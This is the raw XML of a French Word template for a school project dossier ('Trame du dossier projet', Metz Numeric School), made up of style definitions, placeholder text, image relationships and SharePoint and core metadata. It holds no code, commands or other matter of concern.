    <w:link w:val="CitationintenseCar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="003A2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A2DEC"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Rfrenceintense">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="003A2DEC"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sansinterligne">
    <w:name w:val="No Spacing"/>
    <w:link w:val="SansinterligneCar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="003A2DEC"/>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3A2DEC"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:kern w:val="0"/>
      <w:lang w:eastAsia="fr-FR"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="En-tte">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="En-tteCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00690DDD"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4536"/>
        <w:tab w:val="right" w:pos="9072"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="En-tteCar">
    <w:name w:val="En-tête Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="En-tte"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00690DDD"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Pieddepage">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PieddepageCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00690D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90DDD"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="En-ttedetabledesmatires">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Titre1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00B1648B"/>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B1648B"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Lienhypertexte">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B1648B"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B1648B"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="22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B1648B"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:lang w:eastAsia="fr-FR"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="BodyText" w:type="paragraph">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:pPr>
      <w:spacing w:after="60" w:before="0"/>
    </w:pPr>
    <w:qFormat/>
  </w:style>
  <w:style w:customStyle="1" w:styleId="FirstParagraph" w:type="paragraph">
    <w:name w:val="First Paragraph"/>
    <w:basedOn w:val="BodyText"/>
    <w:next w:val="BodyText"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="0" w:after="60"/>
    </w:pPr>
  </w:style>
  <w:style w:customStyle="1" w:styleId="Compact" w:type="paragraph">
    <w:name w:val="Compact"/>
    <w:basedOn w:val="BodyText"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="60" w:before="0"/>
    </w:pPr>
  </w:style>
  <w:style w:styleId="Title" w:type="paragraph">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="240" w:before="480"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="min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20"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="min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inorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="min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inorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="min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inorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="min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inorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="min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inorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="min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inorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="min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inorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="min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inorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="min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200"/>
    </w:pPr>
  </w:style>
  <w:style w:customStyle="1" w:styleId="Figure" w:type="paragraph">
    <w:name w:val="Figure"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="160" w:after="40"/>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szCs w:val="13"/>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inorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:color w:themeColor="accent1" w:themeShade="BF" w:val="365F91"/>
    </w:rPr>
  </w:style>
  <w:style w:customStyle="1" w:styleId="SourceCode" w:type="paragraph">
    <w:name w:val="Source Code"/>
    <w:basedOn w:val="BodyText"/>
    <w:pPr>
      <w:spacing w:after="0" w:before="0" w:line="180" w:lineRule="exact"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="13"/>
      <w:szCs w:val="13"/>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png"/><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 Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><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png"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.png"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.png"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7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899815675A47B7B4ABF5F817745391"/>
        <w:category>
          <w:name w:val="Général"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{98D4A7C8-0D80-4EF7-AFC9-01B4EE32B5C5}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="000E4E3D" w:rsidRDefault="000E4E3D" w:rsidP="000E4E3D">
          <w:pPr>
            <w:pStyle w:val="1C899815675A47B7B4ABF5F817745391"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
            </w:rPr>
            <w:t>[Nom de la société]</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="57014318D7CE4F48ADA44E7B74838425"/>
        <w:category>
          <w:name w:val="Général"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{C25EACFC-B109-453B-A86E-CEE9894EECA1}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="000E4E3D" w:rsidRDefault="000E4E3D" w:rsidP="000E4E3D">
          <w:pPr>
            <w:pStyle w:val="57014318D7CE4F48ADA44E7B74838425"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
              <w:color w:val="156082" w:themeColor="accent1"/>
              <w:sz w:val="88"/>
              <w:szCs w:val="88"/>
            </w:rPr>
            <w:t>[Titre du document]</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="0D0DE46CA74D43BB8D3A1421557AB558"/>
        <w:category>
          <w:name w:val="Général"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{49B3B8FF-CD4D-40E6-9100-234611770CF8}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="000E4E3D" w:rsidRDefault="000E4E3D" w:rsidP="000E4E3D">
          <w:pPr>
            <w:pStyle w:val="0D0DE46CA74D43BB8D3A1421557AB558"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
            </w:rPr>
            <w:t>[Sous-titre du document]</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="0AF80386CB434A129EAD6E9097E6F2BF"/>
        <w:category>
          <w:name w:val="Général"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{9451A7C2-0D1C-4427-9BFE-EFB5D51D0CBA}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="000E4E3D" w:rsidRDefault="000E4E3D" w:rsidP="000E4E3D">
          <w:pPr>
            <w:pStyle w:val="0AF80386CB434A129EAD6E9097E6F2BF"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:color w:val="156082" w:themeColor="accent1"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>[Nom de l’auteur]</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="3B00B65B385D4F37AEB0D2B41B7A5151"/>
        <w:category>
          <w:name w:val="Général"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{35E260D9-EDA4-4EEF-A492-9F42F1413AED}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="000E4E3D" w:rsidRDefault="000E4E3D" w:rsidP="000E4E3D">
          <w:pPr>
            <w:pStyle w:val="3B00B65B385D4F37AEB0D2B41B7A515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E3D"/>
    <w:rsid w:val="000A0913"/>
    <w:rsid w:val="000E4E3D"/>
    <w:rsid w:val="005E2803"/>
    <w:rsid w:val="00AD2507"/>
    <w:rsid w:val="00C53908"/>
    <w:rsid w:val="00D36B4A"/>
    <w:rsid w:val="00EB5D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1C899815675A47B7B4ABF5F817745391">
    <w:name w:val="1C899815675A47B7B4ABF5F817745391"/>
    <w:rsid w:val="000E4E3D"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="57014318D7CE4F48ADA44E7B74838425">
    <w:name w:val="57014318D7CE4F48ADA44E7B74838425"/>
    <w:rsid w:val="000E4E3D"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="0D0DE46CA74D43BB8D3A1421557AB558">
    <w:name w:val="0D0DE46CA74D43BB8D3A1421557AB558"/>
    <w:rsid w:val="000E4E3D"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="0AF80386CB434A129EAD6E9097E6F2BF">
    <w:name w:val="0AF80386CB434A129EAD6E9097E6F2BF"/>
    <w:rsid w:val="000E4E3D"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="3B00B65B385D4F37AEB0D2B41B7A5151">
    <w:name w:val="3B00B65B385D4F37AEB0D2B41B7A5151"/>
    <w:rsid w:val="000E4E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DB1056AF4EE24A9ACD2D2A37685062" ma:contentTypeVersion="14" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="c44e347bdaa0b475859cde96adc6bd1d">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="a77ced0a-a523-444a-b168-aab2dda37bc7" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="648b026af18cd6461fe41ec61e0ad09f" ns3:_="">
    <xsd:import namespace="a77ced0a-a523-444a-b168-aab2dda37bc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7ced0a-a523-444a-b168-aab2dda37b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189470-30E8-431E-B675-755F7C1080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D679E6-D6EF-40B8-A4B6-F659D42B3E0C}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{9468891E-FB8F-48F8-8EC6-C2057608DBA4}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{FB92D651-07AD-40E9-8C38-681CEF7FB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7ced0a-a523-444a-b168-aab2dda37b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677</Words>
  <Characters>3724</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projet</dc:title>
  <dc:subject>Trame du dossier projet</dc:subject>
  <dc:creator>Nom Prenom  / CDA / METZ NUMERICSCHOOL</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Franck QUIRIN</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-19T13:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-22T15:45:00Z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0x0101003CDB1056AF4EE24A9ACD2D2A37685062</vt:lpwstr>
  </property>
</Properties>
</file>